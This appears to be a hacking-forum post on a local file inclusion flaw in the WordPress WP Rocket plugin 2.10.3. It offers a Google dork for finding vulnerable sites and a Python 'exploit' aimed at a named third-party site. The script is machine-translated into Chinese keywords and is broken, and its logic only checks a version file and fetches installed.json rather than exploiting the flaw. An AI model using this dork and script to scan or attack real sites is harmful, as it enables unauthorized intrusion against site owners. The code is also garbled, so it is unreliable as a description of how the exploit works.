H

WP Rocket 2.10.3-本地文件包含(LFI)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
Paulos Yibelo在WordPress WP火箭插件中发现并报告了此本地文件包含漏洞。这可以允许恶意演员包括目标网站的本地文件,并将其输出显示在屏幕上。存储凭据(例如数据库凭据)的文件可能会根据配置允许完整的数据库收购。此漏洞已在版本2.10.4中固定。
利用:
#code由e1.coders
#dork :'由WP Rocket'Filetype :php Intitle:'wp Rocket配置'-'in''-'dirlist'
Dork : http://example.com/wp-content/plugins/wp-rocket/inc/functions/min/v2.10.3/min/min.php
导入请求
进口时间
def check_wp_rocket_version(url):
version_url=url +'/wp-rocket/css/rocket.css'
TRY:
响应=requests.get(version_url)
版本=响应。
如果在版本:中的“ WP Rocket/”
版本=version.split('/')[1]
返回版本
除异常外,E:
打印(在获取WP Rocket版本: {e}'时发生f'Error
没有返回
def test_wp_rocket_lfi_bug(url):
lfi_url=url +'/wp-rocket/inc/vendor/composer/installed.json'
TRY:
响应=requests.get(lfi_url)
if antsphy.status_code==200:
返回true
除异常外,E:
打印(在测试LFI: {e}'时发生f'Error
返回false
def main():
url='http://arvatools.com'
wp_rocket_version=check_wp_rocket_version(url)
如果wp_rocket_version:
打印(F'WP Rocket版本: {wp_rocket_version}')
如果['2.10.0','2.10.1','2.10.2','2.10.3'中的wp_rocket_version] :
结果=test_wp_rocket_lfi_bug(url)
如果结果:
印刷(“ WP Rocket中发现的LFI脆弱性”)
其他:
打印(“ WP Rocket中未发现LFI漏洞”)
其他:
打印('WP Rocket版本不受LFI错误的影响')
其他:
打印(“无法获取WP火箭版本”)
如果name=='__ -Main __':
主要的()
 
后退
顶部